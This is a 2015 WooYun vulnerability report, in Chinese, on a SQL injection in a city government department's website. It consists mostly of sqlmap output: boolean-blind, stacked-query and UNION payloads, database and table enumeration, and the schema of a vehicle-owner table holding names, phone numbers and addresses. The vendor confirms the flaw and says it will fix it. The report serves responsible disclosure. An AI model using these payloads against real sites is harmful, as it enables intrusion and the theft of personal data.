乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
某市敏感部门SQL注入漏洞可UNION(泄露百万信息)
http://**.**.**.**/wsyb/Input.aspx?id=9
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9 AND 1466=1466 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=9;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-9513 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(73)+CHAR(76)+CHAR(106)+CHAR(105)+CHAR(114)+CHAR(118)+CHAR(78)+CHAR(88)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL-----[10:54:41] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012[10:54:41] [INFO] fetching database names[10:54:41] [INFO] the SQL query used returns 9 entries[10:54:41] [INFO] resumed: "CarMS"[10:54:41] [INFO] resumed: "CMCC"[10:54:41] [INFO] resumed: "dnt"[10:54:41] [INFO] resumed: "master"[10:54:41] [INFO] resumed: "model"[10:54:41] [INFO] resumed: "msdb"[10:54:41] [INFO] resumed: "search"[10:54:41] [INFO] resumed: "tempdb"[10:54:41] [INFO] resumed: "WSCGS"available databases [9]:[*] CarMS[*] CMCC[*] dnt[*] master[*] model[*] msdb[*] search[*] tempdb[*] WSCGS
Database: WSCGS+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.tbl_GZ_YSWD_JDC | 375190 || dbo.tbl_GZ_YSWD_JDC | 375190 || dbo.tbl_GZ_YSWD_JSZ | 256892 || dbo.SMS_RECORD | 55187 || dbo.WEIXIN_SUBSCRIBE | 31360 || dbo.tbl_B_Mf_ry | 11466 || dbo.tbl_JSZ | 9269 || dbo.tbl_HPHM | 6191 || dbo.DICTS | 3557 || dbo.View_Send | 2470 || dbo.Yk_Ksjh | 1651 || dbo.Yk_Xyxx | 1287 || dbo.solartermday | 365 || dbo.YY_JJR | 335 || dbo.LunisolarDatas | 201 || dbo.tbl_Content | 183 || dbo.Yk_School | 46 || dbo.tbl_Placard | 28 || dbo.LunisolarSolarTerm | 24 || dbo.tbl_BusinessType | 16 || dbo.tbl_Column | 12 || dbo.tbl_B_Mf_xq | 10 || dbo.tbl_BusinessDict | 10 || dbo.tbl_BusinessYFDJ | 9 || dbo.CHAT_RECORDDict | 8 || dbo.CHAT_RECORDDict | 8 || dbo.SMS_TESTSJHM | 7 || dbo.tbl_Master | 7 || dbo.tbl_JsFile | 6 || dbo.tbl_UserGroup | 4 || dbo.tbl_UserGroup | 4 || dbo.tbl_Ip2 | 3 || dbo.tbl_Ip2 | 3 || dbo.tbl_MyFavorites | 3 || dbo.tbl_Jkcx | 2 || dbo.SMS_BLACKLIST | 1 || dbo.tbl_ArticleTemplate | 1 || dbo.tbl_B_Mf_Jh | 1 || dbo.tbl_FriendLink | 1 || dbo.tbl_System | 1 || dbo.tbl_Template | 1 || dbo.Yk_Dcjl | 1 || dbo.Yk_LS | 1 |+----------------------<code><code>Database: WSCGSTable: tbl_GZ_YSWD_JDC[12 columns]+--------+----------+| Column | Type |+--------+----------+| SJ | datetime || 关联日期 | datetime || 号牌号码 | varchar || 号牌种类 | varchar || 告知编号 | varchar || 序号 | varchar || 所有人 | varchar || 手机号码 | varchar || 服务代码 | varchar || 服务内容 | varchar || 服务名称 | varchar || 邮寄地址 | varchar |+--------+----------+
三个表中都是人员数据!!
危害等级:高
漏洞Rank:11
确认时间:2015-11-02 14:57
非常感谢!你提交的漏洞已验证,会尽快修复。
暂无